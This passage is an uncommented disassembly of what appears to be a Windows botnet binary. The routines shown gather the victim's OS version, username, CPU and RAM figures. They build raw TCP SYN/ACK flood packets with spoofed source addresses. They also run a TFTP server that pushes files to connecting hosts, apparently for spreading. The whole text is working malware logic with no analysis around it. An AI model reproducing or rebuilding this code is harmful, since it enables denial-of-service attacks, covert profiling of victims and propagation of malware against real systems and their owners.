cmp [ebp+var_8C], 5Ah
jnz short loc_41536F
jmp short loc_41535F
; ---------------------------------------------------------------------------
loc_415345: ; CODE XREF: sub_4152DC+2E�j
; DATA XREF: .data:00443A20�o
cmp [ebp+var_90], 5
jnz short loc_41536F
cmp [ebp+var_8C], esi
loc_415354: ; DATA XREF: .data:00443C0C�o
jz short loc_415336
cmp [ebp+var_8C], 1
jnz short loc_415363
loc_41535F: ; CODE XREF: sub_4152DC+67�j
push 3
jmp short loc_41536E
; ---------------------------------------------------------------------------
loc_415363: ; CODE XREF: sub_4152DC+81�j
cmp [ebp+var_8C], 2
jnz short loc_41536F
push 7
loc_41536E: ; CODE XREF: sub_4152DC+4F�j
; sub_4152DC+5C�j ...
pop esi
loc_41536F: ; CODE XREF: sub_4152DC+25�j
; sub_4152DC+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_4152DC endp
; =============== S U B R O U T I N E =======================================
sub_415374 proc near ; CODE XREF: sub_415430+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41537C: ; CODE XREF: sub_415374+35�j
; sub_415374+3B�j
call sub_4157AD
push 3E8h
mov edi, eax
mov ebx, edx
call ds:dword_4942D8
call sub_4157AD
sub eax, edi
push 0
sbb edx, ebx
push esi
push edx
push eax
call sub_41A440
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41537C
jb short loc_4153B1
cmp ebx, esi
ja short loc_41537C
loc_4153B1: ; CODE XREF: sub_415374+37�j
push 0
push 64h
push edi
push ebx
call sub_41A4B0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_415424
jb short loc_4153D0
cmp esi, 50h
jnb short loc_4153D5
loc_4153D0: ; CODE XREF: sub_415374+55�j
push 4Bh
xor edx, edx
pop eax
loc_4153D5: ; CODE XREF: sub_415374+5A�j
test ecx, ecx
ja short loc_415424
jb short loc_4153E0
cmp esi, 47h
jnb short loc_4153E5
loc_4153E0: ; CODE XREF: sub_415374+65�j
push 42h
xor edx, edx
pop eax
loc_4153E5: ; CODE XREF: sub_415374+6A�j
test ecx, ecx
ja short loc_415424
jb short loc_4153F0
cmp esi, 37h
jnb short loc_4153F5
loc_4153F0: ; CODE XREF: sub_415374+75�j
push 32h
xor edx, edx
pop eax
loc_4153F5: ; CODE XREF: sub_415374+7A�j
test ecx, ecx
ja short loc_415424
jb short loc_415400
cmp esi, 26h
jnb short loc_415405
loc_415400: ; CODE XREF: sub_415374+85�j
push 21h
xor edx, edx
pop eax
loc_415405: ; CODE XREF: sub_415374+8A�j
test ecx, ecx
ja short loc_415424
jb short loc_415410
cmp esi, 1Eh
jnb short loc_415415
loc_415410: ; CODE XREF: sub_415374+95�j
push 19h
xor edx, edx
pop eax
loc_415415: ; CODE XREF: sub_415374+9A�j
test ecx, ecx
ja short loc_415424
jb short loc_415420
cmp esi, 0Ah
jnb short loc_415424
loc_415420: ; CODE XREF: sub_415374+A5�j
xor eax, eax
xor edx, edx
loc_415424: ; CODE XREF: sub_415374+53�j
; sub_415374+63�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_415374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415430 proc near ; CODE XREF: sub_40C50A+59E0�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset dword_492050
mov [ebp+var_CC], 94h
call ds:dword_4943F4
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_4154B7
cmp [ebp+var_C4], ebx
jnz short loc_415493
cmp [ebp+var_BC], 1
jnz short loc_41547D
mov [ebp+var_4], offset a95_0 ; "95"
loc_41547D: ; CODE XREF: sub_415430+44�j
cmp [ebp+var_BC], 2
jnz loc_415532
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_415503
; ---------------------------------------------------------------------------
loc_415493: ; CODE XREF: sub_415430+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_4154A5
mov [ebp+var_4], offset a98_0 ; "98"
jmp short loc_4154FA
; ---------------------------------------------------------------------------
loc_4154A5: ; CODE XREF: sub_415430+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_4154F3
mov [ebp+var_4], offset aMe_1 ; "ME"
jmp short loc_4154FA
; ---------------------------------------------------------------------------
loc_4154B7: ; CODE XREF: sub_415430+33�j
cmp [ebp+var_C8], 5
jnz short loc_4154F3
cmp [ebp+var_C4], ebx
jnz short loc_4154D1
mov [ebp+var_4], offset a2k_0 ; "2K"
jmp short loc_4154FA
; ---------------------------------------------------------------------------
loc_4154D1: ; CODE XREF: sub_415430+96�j
cmp [ebp+var_C4], 1
jnz short loc_4154E3
mov [ebp+var_4], offset aXp_0 ; "XP"
jmp short loc_4154FA
; ---------------------------------------------------------------------------
loc_4154E3: ; CODE XREF: sub_415430+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_4154FA
loc_4154F3: ; CODE XREF: sub_415430+7C�j
; sub_415430+8E�j
mov [ebp+var_4], offset a???_0 ; "???"
loc_4154FA: ; CODE XREF: sub_415430+73�j
; sub_415430+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_415532
loc_415503: ; CODE XREF: sub_415430+61�j
cmp [ebp+var_B8], bl
jz short loc_415532
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset aSS_12 ; "%s (%s)"
push eax
call sub_418D70
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_415532: ; CODE XREF: sub_415430+54�j
; sub_415430+D1�j ...
mov ax, word_44274C
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_44B5AC
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41556B
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41556B: ; CODE XREF: sub_415430+12C�j
push [ebp+arg_4]
call sub_40AFEC
pop ecx
push eax
call dword_44B700 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_44B678 ; gethostbyaddr
cmp eax, ebx
jz short loc_415594
push dword ptr [eax]
jmp short loc_415599
; ---------------------------------------------------------------------------
loc_415594: ; CODE XREF: sub_415430+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_415599: ; CODE XREF: sub_415430+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_418D70
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_494320
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_494378
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs_0 ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_494374
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_494404
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_41B4D0
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_4056BD
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_415273
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_4055AD
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_4055AD
pop ecx
pop ecx
push eax
call sub_415374
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+arg_0]
call sub_418EF0
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_415430 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156E4 proc near ; CODE XREF: sub_40C50A+4576�p
; sub_40C50A+5A0E�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_4189A0
add esp, 0Ch
cmp dword_44B7A8, 0
jnz short loc_415758
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_44B590 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_415739
lea eax, [ebp+var_8C]
push offset aNotConnected ; "Not connected"
push eax
call sub_418D70
pop ecx
pop ecx
loc_415739: ; CODE XREF: sub_4156E4+40�j
test [ebp+var_C], 1
jz short loc_415751
push offset aDialUp ; "Dial-up"
loc_415744: ; CODE XREF: sub_4156E4+72�j
lea eax, [ebp+var_8]
push eax
call sub_418D70
pop ecx
pop ecx
jmp short loc_41577A
; ---------------------------------------------------------------------------
loc_415751: ; CODE XREF: sub_4156E4+59�j
push offset aLan ; "LAN"
jmp short loc_415744
; ---------------------------------------------------------------------------
loc_415758: ; CODE XREF: sub_4156E4+28�j
lea eax, [ebp+var_8]
push offset off_442874
push eax
call sub_418D70
lea eax, [ebp+var_8C]
push offset off_442878
push eax
call sub_418D70
add esp, 10h
loc_41577A: ; CODE XREF: sub_4156E4+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+arg_0]
call sub_418EF0
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_4156E4 endp
; =============== S U B R O U T I N E =======================================
sub_4157AD proc near ; CODE XREF: sub_415374:loc_41537C�p
; sub_415374+1C�p
rdtsc
retn
sub_4157AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157B0 proc near ; DATA XREF: sub_40C50A+2D54�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_494308
call edi
push eax
call sub_418FF0
pop ecx
push 0FFh
push 3
push 2
call dword_44B740 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_415879
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_415859
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40842D
add esp, 14h
loc_415859: ; CODE XREF: sub_4157B0+84�j
lea eax, [ebp+var_440]
push eax
call sub_4035E1
push [ebp+var_BC]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
loc_415879: ; CODE XREF: sub_4157B0+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_44B6A0 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4158F7
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_4158D7
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40842D
add esp, 14h
loc_4158D7: ; CODE XREF: sub_4157B0+102�j
lea eax, [ebp+var_440]
push eax
call sub_4035E1
push [ebp+var_BC]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
loc_4158F7: ; CODE XREF: sub_4157B0+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_415967
lea eax, [ebp+var_440]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_418D70
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_415947
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40842D
add esp, 14h
loc_415947: ; CODE XREF: sub_4157B0+172�j
lea eax, [ebp+var_440]
push eax
call sub_4035E1
push [ebp+var_BC]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
loc_415967: ; CODE XREF: sub_4157B0+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call dword_44B6C0 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_44B700 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi
mov [ebp+var_30], eax
loc_41599F: ; CODE XREF: sub_4157B0+430�j
call edi
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_415C63
push 28h
mov [ebp+var_2C], 45h
call dword_44B6C0 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_415A12
call sub_419000
mov esi, eax
shl esi, 8
call sub_419000
add esi, eax
shl esi, 8
call sub_419000
add esi, eax
shl esi, 8
call sub_419000
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_415A28
; ---------------------------------------------------------------------------
loc_415A12: ; CODE XREF: sub_4157B0+233�j
push [ebp+var_240]
call sub_40AFEC
pop ecx
push eax
call dword_44B700 ; inet_addr
mov [ebp+var_20], eax
loc_415A28: ; CODE XREF: sub_4157B0+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_415A46
call sub_419000
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_415A4C
; ---------------------------------------------------------------------------
loc_415A46: ; CODE XREF: sub_4157B0+284�j
push [ebp+var_B8]
loc_415A4C: ; CODE XREF: sub_4157B0+294�j
call dword_44B6C0 ; htons
mov [ebp+var_16], ax
call sub_419000
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_44B6C0 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_44B6BC ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn_2 ; "syn"
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz short loc_415A9C
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_415AF8
; ---------------------------------------------------------------------------
loc_415A9C: ; CODE XREF: sub_4157B0+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck_0 ; "ack"
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz short loc_415ABC
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_415AF8
; ---------------------------------------------------------------------------
loc_415ABC: ; CODE XREF: sub_4157B0+301�j
lea eax, [ebp+var_1BC]
push offset aRandom_2 ; "random"
push eax
call sub_419AB0
pop ecx
test eax, eax
pop ecx
jz short loc_415AF8
call sub_419000
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_419000
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_415AF8: ; CODE XREF: sub_4157B0+2EA�j
; sub_4157B0+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_44B6C0 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_44B6C0 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_418A00
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_418A00
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40B045
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_418A00
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_418A00
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_4189A0
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40B045
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_418A00
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_44B724 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_415BE5
inc [ebp+arg_0]
jmp loc_41599F
; ---------------------------------------------------------------------------
loc_415BE5: ; CODE XREF: sub_4157B0+42B�j
push [ebp+var_4]
call dword_44B758 ; closesocket
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+var_440]
push 200h
push eax
call sub_418EF0
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_415C43
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40842D
add esp, 14h
loc_415C43: ; CODE XREF: sub_4157B0+46E�j
lea eax, [ebp+var_440]
push eax
call sub_4035E1
push [ebp+var_BC]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
loc_415C63: ; CODE XREF: sub_4157B0+203�j
push [ebp+var_4]
call dword_44B758 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_418D70
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_415CD4
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40842D
add esp, 14h
loc_415CD4: ; CODE XREF: sub_4157B0+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_4035E1
push [ebp+var_BC]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
sub_4157B0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415CF4 proc near ; CODE XREF: sub_415CF4:loc_4161DF�p
; DATA XREF: sub_402994+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_415DB7
push 190h
call ds:dword_4942D8
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_415D97
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40842D
add esp, 14h
loc_415D97: ; CODE XREF: sub_415CF4+7E�j
lea eax, [ebp+var_780]
push eax
call sub_4035E1
push [ebp+var_170]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
loc_415DB7: ; CODE XREF: sub_415CF4+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov dword_44D064[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call dword_44B6C0 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call dword_44B6EC ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_415E1C
push 1388h
call ds:dword_4942D8
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_4161DF
; ---------------------------------------------------------------------------
loc_415E1C: ; CODE XREF: sub_415CF4+10D�j
lea eax, [ebp+var_378]
push offset aRb_1 ; "rb"
push eax
call sub_419D70
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_415E9A
push 190h
call ds:dword_4942D8
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40842D
lea eax, [ebp+var_780]
push eax
call sub_4035E1
push [ebp+var_170]
call sub_416507
add esp, 28h
push ebx
call ds:dword_4942FC
loc_415E9A: ; CODE XREF: sub_415CF4+140�j
mov esi, 200h
loc_415E9F: ; CODE XREF: sub_415CF4+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_41619F
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call dword_44B6A8 ; select
test eax, eax
jle loc_416193
mov al, byte_492058
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call dword_44B698 ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_418D70
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_41617D
cmp [ebp+var_D7], 1
jnz loc_4160C9
lea eax, [ebp+var_274]
push eax
call sub_418E70
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_418E70
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_41B790
add esp, 14h
test eax, eax
jnz loc_416083
lea eax, [ebp+var_1C]
push eax
call sub_418E70
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_41B790
add esp, 10h
test eax, eax
jnz loc_416083
push ebx
push ebx
push [ebp+var_8]
call sub_41B7D0
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_419D90
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call dword_44B724 ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset aTftpFileTran_1 ; "[TFTP]: File transfer started to IP: %s"...
loc_416037: ; CODE XREF: sub_415CF4+484�j
lea eax, [ebp+var_780]
push eax
call sub_418D70
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_416071
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40842D
add esp, 14h
loc_416071: ; CODE XREF: sub_415CF4+358�j
lea eax, [ebp+var_780]
push eax
call sub_4035E1
pop ecx
jmp loc_416193
; ---------------------------------------------------------------------------
loc_416083: ; CODE XREF: sub_415CF4+2B6�j
; sub_415CF4+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_442A44
push edi
call dword_44B724 ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_418D70
lea eax, [ebp+var_D8]
push eax
call sub_4035E1
add esp, 14h
jmp loc_416193
; ---------------------------------------------------------------------------
loc_4160C9: ; CODE XREF: sub_415CF4+275�j
cmp [ebp+var_D7], 4
jnz loc_41617D
